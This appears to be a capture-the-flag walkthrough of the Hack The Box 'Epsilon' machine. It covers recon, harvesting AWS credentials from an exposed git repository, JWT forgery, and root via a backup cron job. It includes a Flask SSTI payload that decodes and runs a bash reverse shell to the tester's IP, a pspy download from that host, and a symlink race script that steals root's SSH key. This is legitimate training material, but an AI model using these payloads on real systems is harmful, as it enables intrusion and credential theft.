Epsilon

Detailed Walkthrough

Initial Access

Upon establishing a connection to the VPN, the tester initiated the assessment by performing a service enumeration. This process revealed the following open ports:

22/tcp open OpenSSH 8.2p1
80/tcp open Apache httpd
5000/tcp open Werkzeug Python 3.8.10

The tester navigated to http://epsilon.htb:5000/ and accessed a custom application named Epsilon Costume Shop, which provided an authentication form.

On the other hand, http://epsilon.htb/ uncovered a website that was restricted from access returned a Forbidden.

As part of the enumeration, the tester proceeded to ran Feroxbuster tool revealing a new available paths for enumeration.

❯ feroxbuster --url http://epsilon.htb:5000/ -t 200 --dont-extract-links
                                                                                                                                                                                                                                      
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://epsilon.htb:5000/
 🚩  In-Scope Url          │ epsilon.htb
 🚀  Threads               │ 200
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        4l       34w      232c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      205l      358w     3550c http://epsilon.htb:5000/
302      GET        4l       24w      208c http://epsilon.htb:5000/home => http://epsilon.htb:5000/
302      GET        4l       24w      208c http://epsilon.htb:5000/order => http://epsilon.htb:5000/
200      GET      234l      454w     4288c http://epsilon.htb:5000/track
[####################] - 46s    30000/30000   0s      found:4       errors:0      
[####################] - 45s    30000/30000   664/s   http://epsilon.htb:5000/

By Followig /track endpoint, this exposes an internal tracking function, but it currently lacks authentication and is therefore unusable.

During enumeration of http://epsilon.htb/, a .git folder was found, providing the ability to dump the repositories and server configuration files, revealing valuable insights into the backend logic.

❯ feroxbuster --url http://epsilon.htb/ -t 400 --dont-extract-links -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://epsilon.htb/
 🚩  In-Scope Url          │ epsilon.htb
 🚀  Threads               │ 400
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      309c http://epsilon.htb/.git => http://epsilon.htb/.git/

Using git_dumper, the .git repository was dumped, allowing successful extraction of two internal Python scripts from the application, providing insight into its backend logic and configuration.

❯ python3 git_dumper.py.py http://epsilon.htb/.git /home/Intrusionz3r0/Documents/Labs/Hackthebox/Epsilon/Content/repo
[-] Testing http://epsilon.htb/.git/HEAD [200]
[-] Testing http://epsilon.htb/.git/ [403]
[-] Fetching common files

File: server.py: Flask Server configuration including all the paths and authentication process without secret that is utilized to create the authentication access cookie.
File: track_api_CR_148.py: AWS Lambda to create a zip files which exposed a new subdomain cloud.epsilon.htb without aws_access_key_id or aws_secret_access_key

Reviewing the repository’s commit history showed that the first commit had hardcoded AWS credentials (aws_access_key_id and aws_secret_access_key), exposing sensitive information that could be leveraged for further exploitation.

❯ git log
commit c622771686bd74c16ece91193d29f85b5f9ffa91 (HEAD -> master)
Author: root <root@epsilon.htb>
Date:   Wed Nov 17 17:41:07 2021 +0000

    Fixed Typo

commit b10dd06d56ac760efbbb5d254ea43bf9beb56d2d
Author: root <root@epsilon.htb>
Date:   Wed Nov 17 10:02:59 2021 +0000

    Adding Costume Site

commit c51441640fd25e9fba42725147595b5918eba0f1
Author: root <root@epsilon.htb>
Date:   Wed Nov 17 10:00:58 2021 +0000

    Updatig Tracking API

commit 7cf92a7a09e523c1c667d13847c9ba22464412f3
Author: root <root@epsilon.htb>
Date:   Wed Nov 17 10:00:28 2021 +0000

    Adding Tracking API Module

❯ git show 7cf92a7a09e523c1c667d13847c9ba22464412f3
commit 7cf92a7a09e523c1c667d13847c9ba22464412f3
<SNIF>
+session = Session(
+    aws_access_key_id='<SNIF>',
+    aws_secret_access_key='<SNIF>',
+    region_name='us-east-1',
+    endpoint_url='http://cloud.epsilong.htb')
+aws_lambda = session.client('lambda')

After recovering and configuring the AWS credentials, the aws CLI was used against the internal endpoint to enumerate Lambda functions.

❯ sudo apt-get install awscli -y
❯ aws configure
AWS Access Key ID [****************6TDC]: <SNIF>
AWS Secret Access Key [****************Fo1A]: <SNIF>
Default region name [us-east-1]: us-east-1
Default output format [json]: json
❯ aws lambda list-functions --endpoint-url http://cloud.epsilon.htb

{
    "Functions": [
        {
            "FunctionName": "costume_shop_v1",
            "FunctionArn": "arn:aws:lambda:us-east-1:000000000000:function:costume_shop_v1",
            "Runtime": "python3.7",
            "Role": "arn:aws:iam::123456789012:role/service-role/dev",
            "Handler": "my-function.handler",
            "CodeSize": 478,
            "Description": "",
            "Timeout": 3,
            "LastModified": "2025-10-24T04:49:24.736+0000",
            "CodeSha256": "IoEBWYw6Ka2HfSTEAYEOSnERX7pq0IIVH5eHBBXEeSw=",
            "Version": "$LATEST",
            "VpcConfig": {},
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "RevisionId": "59c5f7d6-923d-4b37-b980-b4a4632d5f68",
            "State": "Active",
            "LastUpdateStatus": "Successful",
            "PackageType": "Zip"
        }
    ]
}

While enumerating costume_shop_v1, a ZIP archive was retrieved that contained the hardcoded secret from server.py. With this secret a valid JWT session cookie could be crafted, allowing immediate impersonation of the admin account.

❯ aws lambda get-function --function-name costume_shop_v1 --endpoint-url http://cloud.epsilon.htb
"Code": {
        "Location": "http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code"
    },

File: lambda_function.py

import json
secret='<SNIF>' #apigateway authorization for CR-124
'''Beta release for tracking'''
def lambda_handler(event, context):
    try:
        id=event['queryStringParameters']['order_id']
        if id:
            return {
               'statusCode': 200,
               'body': json.dumps(str(resp)) #dynamodb tracking for CR-342
            }
        else:
            return {
                'statusCode': 500,
                'body': json.dumps('Invalid Order ID')
            }
    except:
        return {
                'statusCode': 500,
                'body': json.dumps('Invalid Order ID')
            }

❯ cat craft-token.py
import jwt
secret = '<SNIF>'
token=jwt.encode({"username":"admin"},secret,algorithm="HS256")
print(token)
❯ python3 craft-token.py
eyJhbGc<SNIF>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxeA80zzb3Rc4

Once the auth cookie was set, the application granted access to administrative functionalities.

During enumeration, it was observed that the costume field from processed orders was reflected in the web application, making the endpoint susceptible to Server‑Side Template Injection (SSTI).

The request was intercepted with Burp Suite, confirming that the costume parameter was user‑controlled.

The tester crafted a payload and sent it, which resulted in remote code execution and compromise of the server.

SSTI Payload:

{{request.application.__globals__.__builtins__.__import__('os').popen('echo+L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEwLzEyMzQgMD4mMQ%3d%3d|base64+-d|bash').read()}}

Privilege escalation

During privilege‑escalation, pspy was used to monitor system activity and revealed a root‑executed cron job invoking /usr/bin/backup.sh.

tom@epsilon:/dev/shm$ wget 10.10.14.10/pspy64 && chmod +x pspy64 && ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
<SNIF>
2025/10/25 04:45:01 CMD: UID=0     PID=503060 | /usr/sbin/CRON -f 
2025/10/25 04:45:01 CMD: UID=0     PID=503061 | /bin/sh -c /usr/bin/backup.sh 
2025/10/25 04:45:01 CMD: UID=0     PID=503062 | date +%N 
2025/10/25 04:45:01 CMD: UID=0     PID=503063 | /usr/bin/rm -rf /opt/backups/* 
2025/10/25 04:45:01 CMD: UID=0     PID=503064 | /usr/bin/tar -cvf /opt/backups/433028508.tar /var/www/app/ 
2025/10/25 04:45:01 CMD: UID=0     PID=503065 | /bin/bash /usr/bin/backup.sh 
2025/10/25 04:45:01 CMD: UID=0     PID=503066 | cut -d   -f1 
2025/10/25 04:45:01 CMD: UID=0     PID=503067 | sleep 5 
2025/10/25 04:45:06 CMD: UID=0     PID=503068 | date +%N 
2025/10/25 04:45:06 CMD: UID=0     PID=503069 | /bin/bash /usr/bin/backup.sh

The script was designed to create a backup of /var/www/app/ in /opt/backups/, generate a checksum, wait 5 seconds, and then create a final archive containing the application backup and the checksum in /var/backups/web_backups/. The use of tar with the -h (dereference) option made the process vulnerable to local privilege escalation via symbolic‑link manipulation.

tom@epsilon:/dev/shm$ cat /usr/bin/backup.sh 
#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*

The tester replaced the checksum with a symbolic link pointing to /root, waited for the cron job to run, and copied the produced backup archive to /dev/shm. After extracting the archive and setting proper permissions on the recovered private key, the tester used it to SSH into the host as root, resulting in full system compromise.

tom@epsilon:/opt/backups$ rm /opt/backups/checksum && ln -s /root/.ssh/id_rsa /opt/backups/checksum && while true; do sleep 5 && cp /var/backups/web_backups/*.tar /dev/shm && break; done && echo "[+] Backup has been successfully copied"  
rm: remove write-protected regular file '/opt/backups/checksum'? y
[+] Backup has been successfully copied
tom@epsilon:/dev/shm$ tar -xvf 248603323.tar
tom@epsilon:/dev/shm/opt/backups/checksum/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
tom@epsilon:/dev/shm/opt/backups/checksum/.ssh$ chmod 600 id_rsa
tom@epsilon:/dev/shm/opt/backups/checksum/.ssh$ ssh -i id_rsa root@localhost
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-97-generic x86_64)
<SNIF>
root@epsilon:~#

Credentials

Username

Password

Methods

Scope

Notes

👤 Users wordlist

🔑 Password wordlist

Subdomains / Hosts

Subdomain / Host

Host

Description

Notes

cloud.epsilon.htb

10.10.11.134

host a lambda function.

Host Discovered

Nombre

Domain

Low Access

High Access

Epsilon

10.10.11.134

Epsilon.htb

Linux

Scans

# Nmap 7.95 scan initiated Thu Oct 23 21:53:21 2025 as: /usr/lib/nmap/nmap --privileged --open -sS -Pn -n -p- -T5 -A -oN 10.10.11.134_tcp_allports -vvv 10.10.11.134
Nmap scan report for 10.10.11.134
Host is up, received user-set (0.076s latency).
Scanned at 2025-10-23 21:53:21 PDT for 36s
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
|   256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41
| http-git: 
|   10.10.11.134:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Updating Tracking API  # Please enter the commit message for...
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
5000/tcp open  http    syn-ack ttl 63 Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
| http-methods: 
|_  Supported Methods: GET POST HEAD OPTIONS
|_http-title: Costume Shop
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=10/23%OT=22%CT=1%CU=30200%PV=Y%DS=2%DC=T%G=N%TM=68FB06
OS:65%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M552ST11NW7%O2=M552ST11NW7%O3=M552NNT11NW7%O4=M552ST11NW7%O5=M552ST1
OS:1NW7%O6=M552ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M552NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 19.563 days (since Sat Oct  4 08:23:43 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   75.57 ms 10.10.14.1
2   75.79 ms 10.10.11.134

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 23 21:53:57 2025 -- 1 IP address (1 host up) scanned in 35.95 seconds

Scripts / Automations

track_api_CR_148.py

import io
import os
from zipfile import ZipFile
from boto3.session import Session
session = Session(
    aws_access_key_id='<aws_access_key_id>',
    aws_secret_access_key='<aws_secret_access_key>',
    region_name='us-east-1',
    endpoint_url='http://cloud.epsilon.htb')
aws_lambda = session.client('lambda')
def files_to_zip(path):
    for root, dirs, files in os.walk(path):
        for f in files:
            full_path = os.path.join(root, f)
            archive_name = full_path[len(path) + len(os.sep):]
            yield full_path, archive_name
def make_zip_file_bytes(path):
    buf = io.BytesIO()
    with ZipFile(buf, 'w') as z:
        for full_path, archive_name in files_to_zip(path=path):
            z.write(full_path, archive_name)
    return buf.getvalue()
def update_lambda(lambda_name, lambda_code_path):
    if not os.path.isdir(lambda_code_path):
        raise ValueError('Lambda directory does not exist: {0}'.format(lambda_code_path))
    aws_lambda.update_function_code(
        FunctionName=lambda_name,
        ZipFile=make_zip_file_bytes(path=lambda_code_path))

Server.py

#!/usr/bin/python3

import jwt
from flask import *

app = Flask(__name__)
secret = '<secret_key>'

def verify_jwt(token,key):
	try:
		username=jwt.decode(token,key,algorithms=['HS256',])['username']
		if username:
			return True
		else:
			return False
	except:
		return False

@app.route("/", methods=["GET","POST"])
def index():
	if request.method=="POST":
		if request.form['username']=="admin" and request.form['password']=="admin":
			res = make_response()
			username=request.form['username']
			token=jwt.encode({"username":"admin"},secret,algorithm="HS256")
			res.set_cookie("auth",token)
			res.headers['location']='/home'
			return res,302
		else:
			return render_template('index.html')
	else:
		return render_template('index.html')

@app.route("/home")
def home():
	if verify_jwt(request.cookies.get('auth'),secret):
		return render_template('home.html')
	else:
		return redirect('/',code=302)

@app.route("/track",methods=["GET","POST"])
def track():
	if request.method=="POST":
		if verify_jwt(request.cookies.get('auth'),secret):
			return render_template('track.html',message=True)
		else:
			return redirect('/',code=302)
	else:
		return render_template('track.html')

@app.route('/order',methods=["GET","POST"])
def order():
	if verify_jwt(request.cookies.get('auth'),secret):
		if request.method=="POST":
			costume=request.form["costume"]
			message = '''
			Your order of "{}" has been placed successfully.
			'''.format(costume)
			tmpl=render_template_string(message,costume=costume)
			return render_template('order.html',message=tmpl)
		else:
			return render_template('order.html')
	else:
		return redirect('/',code=302)
app.run(debug='true')

Privilege Escalation script

#!/bin/bash

while true;
do
	if [[ -f /opt/backups/checksum ]];then
		rm /opt/backups/checksum
		ln -s /root /opt/backups/checksum
		echo "[+] Symbolic linked has been created to /root"
		sleep 5
		cp /var/backups/web_backups/*.tar /dev/shm/
		echo "[+] Backup has been successfully copied"
		break
	fi
done
root@epsilon:/dev/shm#

Flag Discovered

Flag #

Host

Flag location

Method used

Value

User

10.10.11.134

tom

SSTI

<SNIF>

Root

10.10.11.134

root

Local Privilege escalation via Symbolic Links

<SNIF>

PreviousSteamCloud NextGobox

Last updated 1 month ago